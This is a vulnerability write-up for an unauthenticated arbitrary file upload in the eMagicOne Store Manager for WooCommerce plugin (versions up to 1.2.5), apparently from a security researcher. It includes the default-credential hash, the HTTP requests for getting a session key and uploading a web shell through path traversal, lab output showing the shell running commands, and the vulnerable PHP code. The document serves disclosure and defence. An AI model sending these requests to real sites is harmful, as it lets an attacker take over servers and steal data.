# eMagicOne Store Manager for WooCommerce <= 1.2.5 - Unauthenticated Arbitrary File Upload via set_image Task

The [eMagicOne Store Manager for WooCommerce](https://wordpress.org/plugins/store-manager-connector/) plugin exposes a remote management protocol endpoint (`?connector=bridge`) that allows file uploads to the server. The authentication mechanism relies on a default credential pair (`login=1`, `password=1`) and a session key system. If the default credentials are not changed, an attacker can trivially authenticate, obtain a session key, and upload arbitrary files (including PHP shells) to the WordPress root or any writable directory via the `set_image` task.



## Reproduction
* A POC [CVE-2025-5058.py](./CVE-2025-5058.py) is provided to demonstrate an attacker uploading a web shell named `shell.php`.

```console
python CVE-2025-5058.py https://lab1.hacker      

[*] Requesting session key...
[*] Raw response: {"response_code":20,"revision":11,"module_version":"1.2.5","session_key":"03877e9c7c21be0a8022d0d9397bb5c4d153a7cd51d2ddc2c398465160747f24"}
[+] Got session key: 03877e9c7c21be0a8022d0d9397bb5c4d153a7cd51d2ddc2c398465160747f24
[*] Uploading file via set_image...
[*] Upload response: <br />
<b>Warning</b>:  Trying to access array offset on false in <b>/home/vagrant/research/Lab1/wp-content/plugins/store-manager-connector/classes/class-emosmcwoocommerceoverrider.php</b> on line <b>324</b><br />
<br />
<b>Warning</b>:  Trying to access array offset on false in <b>/home/vagrant/research/Lab1/wp-content/plugins/store-manager-connector/classes/class-emosmcwoocommerceoverrider.php</b> on line <b>325</b><br />
{"response_code":"19","message":"Unable to resize one or more of your pictures"}
[*] Executing Web Shell Commands...
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
    altname enp0s3
    inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
       valid_lft 82708sec preferred_lft 82708sec
    inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 85990sec preferred_lft 13990sec
    inet6 fe80::a00:27ff:fe5b:342f/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
    altname enp0s8
    inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe39:eaeb/64 scope link 
       valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:0a:f0:30:8c brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
</pre>
```

## Vulnerable Flow
### Default Credentials and Hash Calculation

On plugin activation, the following constants are set in `smconnector.php`:

```php
define( 'EMO_SMC_DEFAULT_LOGIN', '1' );
define( 'EMO_SMC_DEFAULT_PASSWORD', '1' );
```

The default hash used for authentication is:
```php
'smconnector_hash'   => md5( EMO_SMC_DEFAULT_LOGIN . EMO_SMC_DEFAULT_PASSWORD ),
```
**Result:** The default hash is `md5('1' . '1')` = `c4ca4238a0b923820dcc509a6f75849b`.


### Session Key Acquisition
A session key is obtained by sending a POST request to the bridge endpoint with the hash and a task (e.g., `get_version`):

```http
POST /?connector=bridge
Content-Type: application/x-www-form-urlencoded

hash=c4ca4238a0b923820dcc509a6f75849b&task=get_version
```

**Relevant code:**  
`classes/class-emosmconnectorcommon.php` (lines ~441-525):

```php
private function check_auth() {
    if ( $this->shop_cart->isset_request_param( 'key' ) ) {
        // ... session key validation ...
    } elseif ( $this->shop_cart->isset_request_param( 'hash' ) ) {
        $hash = (string) $this->shop_cart->get_request_param( 'hash' );
        if ( ! $this->is_hash_valid( $hash ) ) {
            // ... error ...
        }
        $key = $this->generate_session_key( $hash );
        // ... return session key ...
    }
}
```

---

### Session Key Storage

The session key is stored in the `wp_smconnector_session_keys` table:

```php
private function generate_session_key( $hash ) {
    $key = hash( 'sha256', $hash . $timestamp );
    $sql = 'INSERT INTO `' + self::TABLE_SESSION_KEYS
        + "` (`session_key`, `date_added`, `last_activity`) VALUES ('" + $this->shop_cart->p_sql( $key ) + "', '"
        + $date + "', '" + $date + "')";
    $this->shop_cart->exec_sql( $sql );
    return $key;
}
```


### Arbitrary File Upload
With a valid session key, an attacker can upload a file using the `set_image` task, abusing the parameters to write arbitrary files:

```http
POST /?connector=bridge
Content-Type: multipart/form-data

task=set_image&entity_type=product&image_id=../../shell.php&key=<session_key>
file=@shell.php;type=text/plain
```

**Relevant code:**  
`classes/class-emosmconnectorcommon.php` (lines ~2115+):

```php
private function set_image() {
    // ... parameter checks ...
    if ( ! $this->shop_cart->set_image( $entity_type, $image_id, self::UPLOAD_FILE_NAME, $type ) ) {
        $this->generate_error( $this->br_errors['upload_image_error'] );
    }
}
```

`classes/class-emosmcwoocommerceoverrider.php` (lines ~272+):

```php
public function set_image( $entity_type, $image_id, $img, $type ) {
    // ...
    $destination_path = $this->get_shop_root_dir() . "$entity_type/$image_id";
    // ...
    $result = move_uploaded_file( $tmp_name, $destination_path );
    // ...
}
```

**Result:** The file is written to the WordPress root (or any specified directory, via path traversal in image_id). 